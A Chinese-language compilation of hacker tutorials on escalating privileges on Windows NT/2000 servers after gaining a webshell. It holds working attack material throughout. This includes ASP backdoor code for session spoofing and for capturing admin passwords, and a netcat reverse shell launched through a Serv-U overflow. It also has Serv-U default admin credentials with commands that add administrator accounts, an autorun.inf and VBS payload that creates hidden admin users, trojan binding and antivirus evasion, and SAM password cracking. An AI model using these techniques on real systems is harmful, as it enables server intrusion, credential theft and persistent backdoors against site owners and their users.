方法1 :下载系统的 %windir%\repair\sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
问题:(1 )攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2 )这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。
方法2 :使用pwdump(L0pht 自带的,Windows 2000下无效)或者pwdump2 ,取得系统当前的用户列表和口令加密列表,然后用L0pht 破解这个列表。
问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer 身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。
(以上两种是离线的)
方法3 :使用 Enum 等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。
问题:(1 )如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2 )要远程系统开放 Netbios连接,就是 TCP的139 端口,如果用防火墙过滤了的话 Enum 就无法连接到主机。
(以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。)
方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本机运行可以把当前用户帐号加入管理员组。而 PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。
问题:GetAdmin在 SP4有补丁修复了,不能用于高于 SP4的 WinNT 4系统,当然后来又有GetAdmin的增强版本,不过在 SP6a 下好像都不能成功运行。
注:这一方法利用了 WinNT 4系统的安全漏洞,可以安装补丁解决这一问题。
(此外还有变通的方法。)
方法5 :在WinNT 4 和 Windows 2000 注册表里指定用户Shell 程序(Explorer.exe)
时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。
由于在系统启动时程序的搜索顺序问题使得 %Systemdrive%\Explorer.exe(操作系统安装的跟目录下的Explorer.exe)程序执行,这提供了攻击者一个机会在用户下次登录时执行他自己的程序。
问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。
注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。
方法6 :木马:上传木马,然后运行木马,系统重起动后,木马就是本地登录用户的身份了,然后攻击者连接后就有了本地登录用户的权限。因为一般总是管理员本地登录系统,因此这样很可能就获得了管理员的权限。
问题:(1 )杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。
(2 )有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system%\ system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。
解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。
方法7 :Gina、GinaStub木马。虽然这个也叫木马,但是它的功能和上边的那种大不相同,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接到server端,并进行操作。而 ginastub 一般只有一个动态连接库文件,需要手工安装和卸载,他的功能也不是使用client端控制server端,它仅仅就是捕获用户的登录密码。
问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。
注:这一方法利用的不是系统的安全漏洞,因此不能通过安装补丁解决这一问题。关于Gina,可以参见我的另一篇文章《WinLogon登录管理和GINA简介》
方法8 :本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。Win NT4 的 IIS4 的 ASP扩展有一个本地溢出漏洞,Windows 2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然 Windows NT 和 Windows 2000 还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。
问题:(1 )ASP 扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。
(2 )静态图像服务缺省没有安装,只有用户在 Windows 2000 上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。
注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。
Windows 2000专用提升漏洞方法方法1 : Windows 2000 的输入法漏洞,利用这个漏洞任何人可以以LocalSystem 身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触 Windows 2000 计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。
注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。
方法2 :利用 Windows 2000 的 Network DDE DSDM 服务漏洞普通用户可以LocalSystem 身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。
问题:这个服务缺省没有启动,需要启动这个服务。
注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。
方法3 :Windows 2000的 TELNET 服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果 TELNET 发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次 TELNET 创建服务进程时,便会在本地 SYSTEM 环境中运行攻击者代码。
注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。
方法 4 :WINDOWS 2K存在一个利用 Debug Registers提升权限的漏洞。如果攻击者能在 WIN2K中运行程序,利用此漏洞,他至少能取得对 %Windir%\SYSTEM32和注册表HKCR的写权。因为x86 Debug Registers DR0-7 对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。
注:这一方法利用了 Windows 2000 系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。
-------------------------------------------------------------------------------- --
-- 巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)
前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有一些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。其实,对很多功能强大的系统而言,拿到后台也就是拿到了一个好的后门了,呵呵............但是现在比较新的版本的很多asp系统密码都是MD5加密然后配合严格的验证程序来验证的,但是我们就没有办法突破这些限制了吗?no!我今天就是要说怎么突破这些限制让我们直奔后台,有马儿厩是好办事,follow
me............
session欺骗篇
首先简单说一下一般asp系统的身份验证原理。
一般来说,后台管理员在登录页面输入账号密码后,程序会拿着他提交的用户名密码去数据库的管理员表里面找,如果有这个人的账号密码就认为你是管理员,然后给你一个表示你身份的session值。或者程序先把你的用户名密码提取出来,然后到数据库的管理员表里面取出管理员的账号密码来和你提交的相比较,如果相等,就跟上面一样给你个表示你身份的sesion值。然后你进入任何一个管理页面它都要首先验证你的session值,如果是管理员就让你通过,不是的话就引导你回到登录页面或者出现一些奇奇怪怪的警告,这些都跟程序员的个人喜好有关。
知道了原理,我们现在的一个思路就是通过我们的asp木马来修改它的程序然后拿到一个管理员session,这样的话尽管我们没有管理员密码,但是我们一样在后台通行无阻了。我把这种方法称为session欺骗。限于篇幅不能每个系统都能详细说明,本文仅以动力文章系统为例来说明。
动力文章系统3.51,(图一)
图一
其实动力文章系统的所有版本全部通杀,包括动易。大家可以自己实践一下。
我们先来看一下它的验证内容。动力文章3.51的验证页面在Admin_ChkLogin.asp
,其验证内容如下:
............
else
rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
rs("LastLoginTime")=now()
rs("LoginTimes")=rs("LoginTimes")+1
rs.update
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
rs.close
set rs=nothing
call CloseConn()
Response.Redirect "Admin_Index.asp"
前面省略号是用户名密码不正确的验证,直到else,看一下,如果用户名密码正确就给你两个session值:
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样:
if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if
看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话:
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="admin" '这里是假设的,实际操作中可以改成你想要得管理员账号
end if
我简单说一下这句话的意思,就是说从地址栏取得hehe的值,如果hehe=120的话,那么系统就给我们一个值为admin的session。好了,我们输入看一下,图二:
图二
看到有什么异常吗,没有吧?还是正常页面,但是我们接着在地址栏中输入它的后台管理首页看看,是不是进去了?图三:
图三
呵呵,别做坏事哦............
小结一下:我们先找到弄到管理员账号,然后找到它的验证页面,根据它的验证内容来写入我们要的后门。不同的系统有不同的验证方式,比如青创文章系统它不但要验证你的用户名还要验证等级,但是我们总体思路还是一样,就是他验证什么我们就加入什么。
密码窃探篇
可以说上述方法在动网论坛或者其他论坛面前是苍白无力的,因为一般论坛由于交互性较强,所以在验证上考虑了很多。以动网为例,你要登录后台,他先验证你有没有先登录了前台,没有的话就给你返回一个错误页面。你登录前台后系统会给你一个seession来记录你的CacheName和你的ID,然后在你登录后台的时候拿出来比较你前后台身份是否一致,一直就通过,否则kill,面对这样严格的验证,难道我们就没有办法基后台了吗?对,没有了(谁拿鸡蛋扔我?这么浪费。),但是我们可以想新的办法,既然验证这么严格,那么我如果拿着密码光明正大的进去呢?因此,这里一个新的思路就是拿到它的明文密码。什么时候有明文密码呢?对了,就在管理员登录的时候。好,我们就在那里做手脚,把它登录的密码发给我们,然后我们拿和它的密码去登录。呵呵,是不是很像 sniffer啊?在下在前几个月刚和好兄弟潜龙在野利用硬件sniffer配合省网安局的人端掉一个非法电影网站,足足4000G的硬盘,几十台服务器,一个字:爽
好了,我们开始修改它的程序。编辑login.asp,加入以下几句话:
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username='"& request("username")&"') where
UserName='aweige'"
conn.execute(sql)
end if
end if
这几句话的意思就是说如果admin(假设的,实际操作中改为你要的管理员名字)登录成功就更新数据库,把他的密码放到我资料的E-mail中。当然,你必须先在论坛里注册一个用户名。结果如图四:
图四
还有,如果是动网7.0以下的默认数据库admin表名和7.0以上有点不一样,所以实际操作中不可生搬硬套。
后记:
对于以上两种方法直到目前为止我还想不出任何比较有效的解决方法,因为你的网站被人家放了马,你根本就没办法去阻止人家去插入,要是谁有好的解决方法记得告诉我。
另外,希望大家不要去搞破坏,那时我真的不愿看到的,也祝所有的网管们好运,希望你们不会碰上craker们。
--
--
巧用asp木马和KV2004得到管理员权限
重来没写过什么文章,这是第一次,写的不好请大家原谅,高手也不要取笑哦。这里也没什么技术可言,只是我这个菜鸟的一点心得,ok开始。。。
前段时间动网的UPfile.asp漏洞可谓闹的沸沸扬扬,这个漏洞确实很厉害,相信不少新手和我一样种了不少后门在有动网的网站上,但是asp木马的权限确实很底,除了删点文章,删点图片好象没什么用了。不行不得到管理员权限简直就辜负了发现这个漏洞的高手们~v~。好,想办法提升权限,我找啊找!网上提升权限的方法几乎都用过了,都没什么用,补丁打的很全啊!接下来用findpass想解开管理员的密码,又失败,findpass要管理员权限才有用。用 pslist看看晕装的是瑞星+天网,网上的大部分工具遇上这个防御组合一般都没用了。种木马?不行一来
权限太底,二来在瑞星杀天网堵的包围下很少能活出来的。做个添加用户权限的bat文件想放到启动组中去,这个方法虽然有点傻但是有一定的可行性,晕又是权限不够加不进去。c盘下的 "Program Files" "winnt" "Documents and Settings"三个文件甲都没有写权限,更不要说注册表了。郁闷了,给管理员留了句话,然后匆匆下线。
第2天上来一看,嘿嘿图被改回来了,管理员应该发现了,这次更不容易得手。登上asp木马进去看了一下,昨天传上去的几个exe被删了,还好asp木马活下来了,咦!c盘多了文件甲叫 KV2004,原来管理员把瑞星卸了,安了个kv2004,进Program Files看看确实瑞星被卸了。(这里说一下,大部分的杀毒软件默认的安装路径c:\Program Files\,但是kv默认的安装路径是c:\kv2004\)到这里机会就来了我们可以把执行文件捆绑在kv2004上,跟随kv一起启动。因为 kv不在"Program Files" "winnt" "Documents and Settings"这三个文件甲中,很大可能我可以修改
或者上传文件。行动!在kv2004下随便找个htm文件删除:(看看有无写删权限)
C:\>del c:\kv2004\GetLicense.htm
拒绝访问
奇怪了,再来看看文件甲属性
C:\>attrib c:\kv2004
S R C:\KV2004
哦是只读。
C:\>attrib -r -s c:\kv2004
ok!在试试
C:\>del c:\kv2004\GetLicense.htm
成功了!好写个起用帐号和提升权限的bat文件,然后把bat文件和kv2004的系统服务文件KVSrvXP.exe捆绑起来,(注意多下种捆绑器,捆绑一
次用kv2004来扫描一次,因为很多捆绑器生成的文件kv会把他作为病毒来处理掉)准备上传了,先删掉原来的KVSrvXP.exe。
C:\>del c:\kv2004\KVSrvXP.exe
拒绝访问
可能是KVSrvXP.exe被windows调用中,删不掉。没办法了吗?不,删不掉我改名
C:\>ren c:\kv2004\KVSrvXP.exe kv.exe
OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中,接下来就去睡觉把。
4个小时后登上来用:
net user 起用的帐户
已经在administrators组中,接下来要关防火墙,关杀毒软件,还是种木马你随便我了,哈哈!
我觉得入侵没什么固定的模式,具体情况具体分析,杀毒软件同样也可以帮我们忙,这里我只提供了一种思路。请大家指教。
如何绕过防火墙提升权限
本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。
废话少说,咱们进入正题。
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用 WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。
测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。
思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。
传上了srv.exe和nc.exe在H:\long\sun***\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D: \Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。
可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。
不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是 FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\,运行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。
我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传 n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)
高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用刚才nc得到的 shell把它们copy到d:\winnt\system32\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。
一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的 ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\program files\serv-u\里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生 530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)
不管了,我们重启serv-u就ok 了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。
好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:
ftp>quote site exec net user xr rain /add
在webshell上运行net user,就可以看见添加成功了。
整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
CAcls命令在提权中的使用
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
F:safe溢出工具\sqlhello2>cacls
显示或者修改文件的访问控制表(ACL)
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename 显示 ACL。
/T 更改当前目录及其所有子目录中
指定文件的 ACL。
/E 编辑 ACL 而不替换。
/C 在出现拒绝访问错误时继续。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
/P user:perm 替换指定用户的访问权限。
Perm 可以是: N 无
R 读取
W 写入
C 更改(写入)
F 完全控制
/D user 拒绝指定用户的访问。
在命令中可以使用通配符指定多个文件。
c: d: e:.....
C:Documents and SettingsAll Users「开始」菜单\程序
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:Program Filesserv-u
C:WINNTsystem32config
下它的SAM,破解密码
c:winntsystem32inetsrvdata
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:prel
C:Program FilesJava Web Start
c:Documents and Settings
C:Documents and SettingsAll Users
c:winntsystem32inetsrvdata
c:Program Files
c:Program Filesserv-u
C:Program FilesMicrosoft SQL Server
c:Temp
c:mysql(如果服务器支持PHP)
c:PHP(如果服务器支持PHP)
运行"cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:Documents and SettingsAll Users「开始」菜单\程序启动"写入bat,vbs等木马。
根目录下隐藏autorun.inf
C:PROGRAM FILESKV2004 绑
D:PROGRAM FILESRISINGRAV
C:Program FilesRealRealServer
rar
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下
replace 替换法 捆绑
脚本 编写一个启动/关机脚本 重起
删SAM :( 错
CAcls命令
FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的权限提升21大法!
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去
。本人从来米成功过。,端口到是给对方打开了。
2.paanywhere
C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF
文件,在本地安装pcanywhere上去
3.SAM破解
C:WINNTsystem32config 下他的SAM 破解之
4.SU密码夺取
C:Documents and SettingsAll Users「开始」菜单\程序
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:
TimeOut=600
Maintenance=System
Access1=C:|RWAMELCDP
Access1=d:|RWAMELCDP
Access1=f:|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:winntsystem32inetsrvdata
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,
然后执行
6.SU溢出提权
这个网上教程N多 不详细讲解了
7.运行Csript
引用:运行"cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提
升权限
用这个cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll"
"C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll"
"C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32
inetsrvasp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 8.脚本提权
c:Documents and SettingsAll Users「开始」菜单\程序启动"写入bat,vbs
9.VNC
这个是小花的文章 HOHO
默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮
箱号 手机号 尽量看看 HOHO
12.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信
他不运行
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义
文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后
我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名">
然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方
任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重
起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个
服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的
Serv-u了
18.SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的
ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass
中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可
以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
引用:因为asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定相同
)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll"
"C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll"
"C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32
inetsrvasp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到
C:InetpubAdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把
asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
20.Magic Winmail
前提是你要有个webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧
21.DBO……
其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底!
感谢noangel
WEBSHELL权限提升
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的 81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序
三
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上
四
replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。
[drive2:][path2] 指定要替换文件的
目录。
/A 把新文件加入目标目录。不能和
/S 或 /U 命令行开关搭配使用。
/P 替换文件或加入源文件之前会先提示您
进行确认。
/R 替换只读文件以及未受保护的
文件。
/S 替换目标目录中所有子目录的文件。
不能与 /A 命令选项
搭配使用。
/W 等您插入磁盘以后再运行。
/U 只会替换或更新比源文件日期早的文件。
